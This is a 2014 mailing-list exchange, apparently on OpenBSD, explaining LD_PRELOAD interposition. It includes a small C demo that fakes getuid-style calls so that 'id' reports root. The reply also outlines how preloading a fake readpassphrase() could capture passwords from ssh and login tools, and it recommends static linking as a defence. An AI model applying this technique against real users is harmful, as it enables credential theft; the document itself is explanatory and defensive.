2014-02-17 13:15 GMT+01:00 <[email protected]>: > On 16. februar 2014 at 10:11 PM, "Daniel Cegiełka" > <[email protected]> wrote: > > try this: > > --- cat id0.c --- > int getuid(){return 0;} > int geteuid(){return 0;} > int getgid(){return 0;} > int getegid(){return 0;} > --- end cut --- > > # shell (as normal user): > id -un > cc -shared id0.c -o id0 > LD_PRELOAD=./id0 sh > id -un > > > What does that do? > > O.D.
Nothing (it's safe to self-test, so have fun). id (or whoami) think that calls functions from libc, but it really calls functions that are loaded by LD_PRELOAD. These fake functions return 0, so id (whoami) think that you are root. Attacks with LD_PRELOAD are very old and can be performed on any OS where you have dynamic linking (Linux, *BSD etc.), so yes, OpenBSD is "vulnerable" to this type of stuff. The real attack can be done by loading e.g. fake readpassphrase() function. http://www.openbsd.org/cgi-bin/man.cgi?query=readpassphrase&sektion=3 readpassphrase() is used e.g. in /usr/libexec/auth/login_* stuff, signify, ssh, ssh-keygen, ssh-agent, nc, ftp etc. Each of these programs are dynamically linked, so are LD_PRELOAD sensitive. If an attacker __can__ LD_PRELOAD false readpassphrase(), will e.g. be able to get to know your password. Solution: static linking of critical binaries. I hope that my explanation was helpful. best regards, Daniel
